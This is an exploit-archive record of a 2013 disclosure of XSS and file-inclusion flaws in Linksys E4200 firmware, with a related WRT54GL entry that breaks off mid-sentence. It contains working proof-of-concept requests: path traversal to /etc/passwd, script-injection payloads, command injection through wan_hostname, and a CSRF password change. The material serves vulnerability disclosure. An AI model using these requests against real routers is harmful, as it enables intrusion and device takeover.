Cisco Linksys E4200 Cross Site Scripting / Local File Inclusion
2013-05-07T00:00:00
ID PACKETSTORM:121551 Type packetstorm Reporter sqlhacker Modified 2013-05-07T00:00:00
Description
`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=============================================
XSS, LFI in Cisco, Linksys E4200 Firmware
=============================================
URL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html
=============================================
January 30, 2013
=============================================
Keywords
=============================================
XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit,
Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp
CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682,
CVE-2013-2683, CVE-2013-2684
=============================================
Summary
Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router
Firmware Version: 1.0.05 build 7 were discovered by our Researchers in
January 2013 and finally acknowledged by Linksys in April 2013. The Vendor
is unable to Patch the Vulnerability in a reasonable timeframe. This
document will introduce and discuss the vulnerability and provide
Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version
1.10 Released on July 9, 2012, and prior versions.
=============================================
Overview
Linksys is a brand of home and small office networking products and a
company founded in 1988, which was acquired by Cisco Systems in 2003. In
2013, as part of its push away from the consumer market, Cisco sold their
home networking division and Linksys to Belkin. Former Linksys products are
now branded as Linksys by Cisco.
Products currently and previously sold under the Linksys brand name include
broadband and wireless routers, consumer and small business grade Ethernet
switching, VoIP equipment, wireless internet video camera, AV products,
network storage systems, and other products.
Linksys products were widely available in North America off-the-shelf from
both consumer electronics stores (CompUSA and Best Buy), internet
retailers, and big-box retail stores (WalMart). Linksys' significant
competition as an independent networking firm were D-Link and NetGear, the
latter for a time being a brand of Cisco competitor Nortel.
=============================================
Vendor Software Fingerprint
=============================================
# Copyright (C) 2009, CyberTAN Corporation
# All Rights Reserved.
#
# THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF
ANY
# KIND, EXPRESS OR IMPLIED, BY STATUTE.....
=============================================
The PoC's
=============================================
LFI PoC
=============================================
POST /storage/apply.cgi HTTP/1.1
HOST: my.vunerable.e4500.firmware
submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila
_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd
=============================================
XSS PoC
=============================================
/apply.cgi [log_type parameter]
/apply.cgi [ping_ip parameter]
/apply.cgi [ping_size parameter]
/apply.cgi [submit_type parameter]
/apply.cgi [traceroute_ip parameter]
/storage/apply.cgi [new_workgroup parameter]
/storage/apply.cgi [submit_button parameter]
=============================================
POST /apply.cgi HTTP/1.1
�..
change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t
ype=&log_type=ilog14568"%3balert(1)//482
=============================================
Other XSS PoC�s
=============================================
&ping_ip='><script>alert(1)</script>
&ping_size='><script>alert(1)</script>
&submit_type=start_traceroute'%3balert(1)//
&traceroute_ip=a.b.c.d"><script>alert(1)</script>
=============================================
CVE Information
=============================================
File path traversal CVE-2013-2678
Cross-site scripting (reflected) CVE-2013-2679
Cleartext submission of password CVE-2013-2680
Password field with autocomplete enabled CVE-2013-2681
Frameable response (Clickjacking) CVE-2013-2682
Private IP addresses disclosed CVE-2013-2683
HTML does not specify charset CVE-2013-2684
CVSS Version 2 Score = 4.5
=============================================
END
=============================================
-----BEGIN PGP SIGNATURE-----
Version: 10.2.0.2526
wsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser
M3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG
uJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy
ul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy
7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI
V8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg==
=w123
-----END PGP SIGNATURE-----
`
{"id": "PACKETSTORM:121551", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Cisco Linksys E4200 Cross Site Scripting / Local File Inclusion", "description": "", "published": "2013-05-07T00:00:00", "modified": "2013-05-07T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/121551/Cisco-Linksys-E4200-Cross-Site-Scripting-Local-File-Inclusion.html", "reporter": "sqlhacker", "references": [], "cvelist": ["CVE-2013-2678", "CVE-2013-2680", "CVE-2013-2681", "CVE-2013-2684", "CVE-2013-2679", "CVE-2013-2682", "CVE-2013-2683"], "lastseen": "2016-12-05T22:25:06", "viewCount": 10, "enchantments": {"score": {"value": 5.3, "vector": "NONE", "modified": "2016-12-05T22:25:06", "rev": 2}, "dependencies": {"references": [{"type": "exploitpack", "idList": ["EXPLOITPACK:79444388E4AB6DA3A97F1DB2022E7531"]}, {"type": "exploitdb", "idList": ["EDB-ID:25292", "EDB-ID:24478", "EDB-ID:24475", "EDB-ID:24202", "EDB-ID:38501"]}, {"type": "cve", "idList": ["CVE-2013-2678", "CVE-2013-2682", "CVE-2013-2681", "CVE-2013-2684", "CVE-2013-2683", "CVE-2013-2679", "CVE-2013-2680"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13169", "SECURITYVULNS:DOC:29559"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122342"]}, {"type": "securelist", "idList": ["SECURELIST:6FF73BA3D8BB759BAC6F6A8B20F0F19D"]}], "modified": "2016-12-05T22:25:06", "rev": 2}, "vulnersScore": 5.3}, "sourceHref": "https://packetstormsecurity.com/files/download/121551/ciscolinksyse4200-xsslfi.txt", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA256 \n \n============================================= \n \nXSS, LFI in Cisco, Linksys E4200 Firmware \n \n============================================= \n \nURL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html \n \n============================================= \n \n \nJanuary 30, 2013 \n \n============================================= \n \nKeywords \n \n============================================= \n \nXSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, \nZero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp \n \nCVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, \nCVE-2013-2683, CVE-2013-2684 \n \n============================================= \n \nSummary \n \nReflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router \nFirmware Version: 1.0.05 build 7 were discovered by our Researchers in \nJanuary 2013 and finally acknowledged by Linksys in April 2013. The Vendor \nis unable to Patch the Vulnerability in a reasonable timeframe. This \ndocument will introduce and discuss the vulnerability and provide \nProof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version \n1.10 Released on July 9, 2012, and prior versions. \n \n============================================= \n \nOverview \n \nLinksys is a brand of home and small office networking products and a \ncompany founded in 1988, which was acquired by Cisco Systems in 2003. In \n2013, as part of its push away from the consumer market, Cisco sold their \nhome networking division and Linksys to Belkin. Former Linksys products are \nnow branded as Linksys by Cisco. \n \n \n \nProducts currently and previously sold under the Linksys brand name include \nbroadband and wireless routers, consumer and small business grade Ethernet \nswitching, VoIP equipment, wireless internet video camera, AV products, \nnetwork storage systems, and other products. \n \n \n \nLinksys products were widely available in North America off-the-shelf from \nboth consumer electronics stores (CompUSA and Best Buy), internet \nretailers, and big-box retail stores (WalMart). Linksys' significant \ncompetition as an independent networking firm were D-Link and NetGear, the \nlatter for a time being a brand of Cisco competitor Nortel. \n \n============================================= \n \nVendor Software Fingerprint \n \n============================================= \n \n# Copyright (C) 2009, CyberTAN Corporation \n \n# All Rights Reserved. \n \n# \n \n# THIS SOFTWARE IS OFFERED \"AS IS\", AND CYBERTAN GRANTS NO WARRANTIES OF \nANY \n \n# KIND, EXPRESS OR IMPLIED, BY STATUTE..... \n \n============================================= \n \nThe PoC's \n \n============================================= \n \nLFI PoC \n \n============================================= \n \nPOST /storage/apply.cgi HTTP/1.1 \n \nHOST: my.vunerable.e4500.firmware \n \nsubmit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila \n_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd \n \n============================================= \n \nXSS PoC \n \n============================================= \n \n/apply.cgi [log_type parameter] \n \n/apply.cgi [ping_ip parameter] \n \n/apply.cgi [ping_size parameter] \n \n/apply.cgi [submit_type parameter] \n \n/apply.cgi [traceroute_ip parameter] \n \n/storage/apply.cgi [new_workgroup parameter] \n \n/storage/apply.cgi [submit_button parameter] \n \n============================================= \n \nPOST /apply.cgi HTTP/1.1 \n \n\ufffd.. \n \nchange_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t \nype=&log_type=ilog14568\"%3balert(1)//482 \n \n============================================= \n \nOther XSS PoC\ufffds \n \n============================================= \n \n&ping_ip='><script>alert(1)</script> \n \n&ping_size='><script>alert(1)</script> \n \n&submit_type=start_traceroute'%3balert(1)// \n \n&traceroute_ip=a.b.c.d\"><script>alert(1)</script> \n \n============================================= \n \nCVE Information \n \n============================================= \n \nFile path traversal CVE-2013-2678 \n \nCross-site scripting (reflected) CVE-2013-2679 \n \nCleartext submission of password CVE-2013-2680 \n \nPassword field with autocomplete enabled CVE-2013-2681 \n \nFrameable response (Clickjacking) CVE-2013-2682 \n \nPrivate IP addresses disclosed CVE-2013-2683 \n \nHTML does not specify charset CVE-2013-2684 \n \nCVSS Version 2 Score = 4.5 \n \n============================================= \n \nEND \n \n============================================= \n \n-----BEGIN PGP SIGNATURE----- \nVersion: 10.2.0.2526 \n \nwsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser \nM3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG \nuJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy \nul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy \n7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI \nV8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg== \n=w123 \n-----END PGP SIGNATURE----- \n \n`\n"}
{"exploitpack": [{"lastseen": "2020-04-01T19:04:09", "description": "\nCisco Linksys E4200 - Multiple Vulnerabilities", "edition": 1, "published": "2013-05-07T00:00:00", "title": "Cisco Linksys E4200 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2678", "CVE-2013-2680", "CVE-2013-2681", "CVE-2013-2684", "CVE-2013-2679", "CVE-2013-2682", "CVE-2013-2683"], "modified": "2013-05-07T00:00:00", "id": "EXPLOITPACK:79444388E4AB6DA3A97F1DB2022E7531", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=============================================\n\nXSS, LFI in Cisco, Linksys E4200 Firmware\n\n=============================================\n\nURL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html\n\n=============================================\n\n\nJanuary 30, 2013\n\n=============================================\n\nKeywords\n\n=============================================\n\nXSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit,\nZero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp\n\nCVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682,\nCVE-2013-2683, CVE-2013-2684\n\n=============================================\n\nSummary\n\nReflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router\nFirmware Version: 1.0.05 build 7 were discovered by our Researchers in\nJanuary 2013 and finally acknowledged by Linksys in April 2013. The Vendor\nis unable to Patch the Vulnerability in a reasonable timeframe. This\ndocument will introduce and discuss the vulnerability and provide\nProof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version\n1.10 Released on July 9, 2012, and prior versions.\n\n=============================================\n\nOverview\n\nLinksys is a brand of home and small office networking products and a\ncompany founded in 1988, which was acquired by Cisco Systems in 2003. In\n2013, as part of its push away from the consumer market, Cisco sold their\nhome networking division and Linksys to Belkin. Former Linksys products are\nnow branded as Linksys by Cisco.\n\n\n\nProducts currently and previously sold under the Linksys brand name include\nbroadband and wireless routers, consumer and small business grade Ethernet\nswitching, VoIP equipment, wireless internet video camera, AV products,\nnetwork storage systems, and other products.\n\n\n\nLinksys products were widely available in North America off-the-shelf from\nboth consumer electronics stores (CompUSA and Best Buy), internet\nretailers, and big-box retail stores (WalMart). Linksys' significant\ncompetition as an independent networking firm were D-Link and NetGear, the\nlatter for a time being a brand of Cisco competitor Nortel.\n\n=============================================\n\nVendor Software Fingerprint\n\n=============================================\n\n# Copyright (C) 2009, CyberTAN Corporation\n\n# All Rights Reserved.\n\n#\n\n# THIS SOFTWARE IS OFFERED \"AS IS\", AND CYBERTAN GRANTS NO WARRANTIES OF\nANY\n\n# KIND, EXPRESS OR IMPLIED, BY STATUTE.....\n\n=============================================\n\nThe PoC's\n\n=============================================\n\nLFI PoC\n\n=============================================\n\nPOST /storage/apply.cgi HTTP/1.1\n\nHOST: my.vunerable.e4500.firmware\n\nsubmit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila\n_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd\n\n=============================================\n\nXSS PoC\n\n=============================================\n\n /apply.cgi [log_type parameter]\n\n /apply.cgi [ping_ip parameter]\n\n /apply.cgi [ping_size parameter]\n\n /apply.cgi [submit_type parameter]\n\n /apply.cgi [traceroute_ip parameter]\n\n /storage/apply.cgi [new_workgroup parameter]\n\n /storage/apply.cgi [submit_button parameter]\n\n=============================================\n\nPOST /apply.cgi HTTP/1.1\n\n\ufffd..\n\nchange_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t\nype=&log_type=ilog14568\"%3balert(1)//482\n\n=============================================\n\nOther XSS PoC\ufffds\n\n=============================================\n\n&ping_ip='><script>alert(1)</script>\n\n&ping_size='><script>alert(1)</script>\n\n&submit_type=start_traceroute'%3balert(1)//\n\n&traceroute_ip=a.b.c.d\"><script>alert(1)</script>\n\n=============================================\n\nCVE Information\n\n=============================================\n\nFile path traversal CVE-2013-2678\n\nCross-site scripting (reflected) CVE-2013-2679\n\nCleartext submission of password CVE-2013-2680\n\nPassword field with autocomplete enabled CVE-2013-2681\n\nFrameable response (Clickjacking) CVE-2013-2682\n\nPrivate IP addresses disclosed CVE-2013-2683\n\nHTML does not specify charset CVE-2013-2684\n\nCVSS Version 2 Score = 4.5\n\n=============================================\n\nEND\n\n=============================================\n\n-----BEGIN PGP SIGNATURE-----\nVersion: 10.2.0.2526\n\nwsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser\nM3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG\nuJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy\nul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy\n7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI\nV8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg==\n=w123\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T01:03:21", "description": "Cisco Linksys E4200 Firmware - Multiple Vulnerabilities. CVE-2013-2678,CVE-2013-2679,CVE-2013-2680,CVE-2013-2681,CVE-2013-2682,CVE-2013-2683,CVE-2013-2684. W...", "published": "2013-05-07T00:00:00", "type": "exploitdb", "title": "Cisco Linksys E4200 Firmware - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2678", "CVE-2013-2680", "CVE-2013-2681", "CVE-2013-2684", "CVE-2013-2679", "CVE-2013-2682", "CVE-2013-2683"], "modified": "2013-05-07T00:00:00", "id": "EDB-ID:25292", "href": "https://www.exploit-db.com/exploits/25292/", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA256\r\n\r\n=============================================\r\n\r\nXSS, LFI in Cisco, Linksys E4200 Firmware\r\n\r\n=============================================\r\n\r\nURL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html\r\n\r\n=============================================\r\n\r\n\r\nJanuary 30, 2013\r\n\r\n=============================================\r\n\r\nKeywords\r\n\r\n=============================================\r\n\r\nXSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit,\r\nZero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp\r\n\r\nCVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682,\r\nCVE-2013-2683, CVE-2013-2684\r\n\r\n=============================================\r\n\r\nSummary\r\n\r\nReflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router\r\nFirmware Version: 1.0.05 build 7 were discovered by our Researchers in\r\nJanuary 2013 and finally acknowledged by Linksys in April 2013. The Vendor\r\nis unable to Patch the Vulnerability in a reasonable timeframe. This\r\ndocument will introduce and discuss the vulnerability and provide\r\nProof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version\r\n1.10 Released on July 9, 2012, and prior versions.\r\n\r\n=============================================\r\n\r\nOverview\r\n\r\nLinksys is a brand of home and small office networking products and a\r\ncompany founded in 1988, which was acquired by Cisco Systems in 2003. In\r\n2013, as part of its push away from the consumer market, Cisco sold their\r\nhome networking division and Linksys to Belkin. Former Linksys products are\r\nnow branded as Linksys by Cisco.\r\n\r\n\r\n\r\nProducts currently and previously sold under the Linksys brand name include\r\nbroadband and wireless routers, consumer and small business grade Ethernet\r\nswitching, VoIP equipment, wireless internet video camera, AV products,\r\nnetwork storage systems, and other products.\r\n\r\n\r\n\r\nLinksys products were widely available in North America off-the-shelf from\r\nboth consumer electronics stores (CompUSA and Best Buy), internet\r\nretailers, and big-box retail stores (WalMart). Linksys' significant\r\ncompetition as an independent networking firm were D-Link and NetGear, the\r\nlatter for a time being a brand of Cisco competitor Nortel.\r\n\r\n=============================================\r\n\r\nVendor Software Fingerprint\r\n\r\n=============================================\r\n\r\n# Copyright (C) 2009, CyberTAN Corporation\r\n\r\n# All Rights Reserved.\r\n\r\n#\r\n\r\n# THIS SOFTWARE IS OFFERED \"AS IS\", AND CYBERTAN GRANTS NO WARRANTIES OF\r\nANY\r\n\r\n# KIND, EXPRESS OR IMPLIED, BY STATUTE.....\r\n\r\n=============================================\r\n\r\nThe PoC's\r\n\r\n=============================================\r\n\r\nLFI PoC\r\n\r\n=============================================\r\n\r\nPOST /storage/apply.cgi HTTP/1.1\r\n\r\nHOST: my.vunerable.e4500.firmware\r\n\r\nsubmit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila\r\n_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd\r\n\r\n=============================================\r\n\r\nXSS PoC\r\n\r\n=============================================\r\n\r\n /apply.cgi [log_type parameter]\r\n\r\n /apply.cgi [ping_ip parameter]\r\n\r\n /apply.cgi [ping_size parameter]\r\n\r\n /apply.cgi [submit_type parameter]\r\n\r\n /apply.cgi [traceroute_ip parameter]\r\n\r\n /storage/apply.cgi [new_workgroup parameter]\r\n\r\n /storage/apply.cgi [submit_button parameter]\r\n\r\n=============================================\r\n\r\nPOST /apply.cgi HTTP/1.1\r\n\r\n\ufffd..\r\n\r\nchange_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t\r\nype=&log_type=ilog14568\"%3balert(1)//482\r\n\r\n=============================================\r\n\r\nOther XSS PoC\ufffds\r\n\r\n=============================================\r\n\r\n&ping_ip='><script>alert(1)</script>\r\n\r\n&ping_size='><script>alert(1)</script>\r\n\r\n&submit_type=start_traceroute'%3balert(1)//\r\n\r\n&traceroute_ip=a.b.c.d\"><script>alert(1)</script>\r\n\r\n=============================================\r\n\r\nCVE Information\r\n\r\n=============================================\r\n\r\nFile path traversal CVE-2013-2678\r\n\r\nCross-site scripting (reflected) CVE-2013-2679\r\n\r\nCleartext submission of password CVE-2013-2680\r\n\r\nPassword field with autocomplete enabled CVE-2013-2681\r\n\r\nFrameable response (Clickjacking) CVE-2013-2682\r\n\r\nPrivate IP addresses disclosed CVE-2013-2683\r\n\r\nHTML does not specify charset CVE-2013-2684\r\n\r\nCVSS Version 2 Score = 4.5\r\n\r\n=============================================\r\n\r\nEND\r\n\r\n=============================================\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: 10.2.0.2526\r\n\r\nwsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser\r\nM3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG\r\nuJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy\r\nul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy\r\n7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI\r\nV8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg==\r\n=w123\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/25292/"}, {"lastseen": "2016-02-02T22:44:50", "description": "linksys wrt54gl firmware 4.30.15 build 2 - Multiple Vulnerabilities. CVE-2013-2679. Webapps exploit for hardware platform", "published": "2013-01-18T00:00:00", "type": "exploitdb", "title": "linksys wrt54gl firmware 4.30.15 build 2 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2679"], "modified": "2013-01-18T00:00:00", "id": "EDB-ID:24202", "href": "https://www.exploit-db.com/exploits/24202/", "sourceData": "Device Name: Linksys WRT54GL v1.1\r\nVendor: Linksys/Cisco\r\n\r\n============ Vulnerable Firmware Releases: ============\r\n\r\nFirmware Version: 4.30.15 build 2, 01/20/2011\r\n\r\n============ Device Description: ============\r\n\r\nThe Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.\r\n\r\nSource: http://homesupport.cisco.com/en-us/support/routers/WRT54GL\r\n\r\n============ Shodan Torks ============\r\n\r\nShodan Search: WRT54GL\r\n=> Results 27190 devices\r\n\r\n============ Vulnerability Overview: ============\r\n\r\n* OS Command Injection\r\n=> parameter: wan_hostname\r\n=> command: `%20ping%20192%2e168%2e178%2e101%20`\r\n\r\nThe vulnerability is caused by missing input validation in the wan_hostname parameter and can be exploited to inject and execute arbitrary shell commands. With wget it is possible to upload and execute a backdoor to compromise the device.\r\nYou need to be authenticated to the device or you have to find other methods for inserting the malicious commands.\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/OS-Command-Injection-param_wan_hostname.png\r\n\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.166\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.166/index.asp\r\nAuthorization: Basic xxxxx\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 734\r\nConnection: close\r\n\r\nsubmit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1\r\n\r\n=> Change the request method from HTTP Post to HTTP GET makes the exploitation easier:\r\n\r\nhttp://192.168.178.166/apply.cgi?submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1\r\n\r\n=> This setting is placed permanent into the configuration and so it gets executed on every bootup process of the device.\r\n\r\n* For changing the current password there is no request to the current password\r\n\r\nWith this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.\r\n\r\n\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.166\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.166/Management.asp\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 299\r\n\r\nsubmit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd&http_passwdConfirm=pwnd&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0\r\n\r\n* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:\r\n\r\nhttp://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd1&http_passwdConfirm=pwnd1&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0\r\n\r\n* reflected XSS\r\n\r\n=> parameter: submit_button\r\n\r\nInjecting scripts into the parameter submit_button reveals that this parameter is not properly validated for malicious input.\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/reflected-XSS-01.png\r\n\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.166\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.166/Wireless_Basic.asp\r\nAuthorization: Basic xxxx=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 155\r\n\r\nsubmit_button=Wireless_Basic'%3balert('pwnd')//&action=Apply&submit_type=&change_action=&next_page=&wl_net_mode=mixed&wl_ssid=test&wl_channel=6&wl_closed=0\r\n\r\n* stored XSS (Access Restrictions -> Richtliniennamen eingeben (place the XSS) -> Zusammenfassung (Scriptcode gets executed)\r\n\r\n=> parameter: f_name\r\n\r\nInjecting scripts into the parameter f_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods like CSRF for inserting the malicious JavaScript code.\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/stored-XSS-Filters.png\r\n\r\n=> Change the request methode from HTTP Post to HTTP GET makes the exploitation 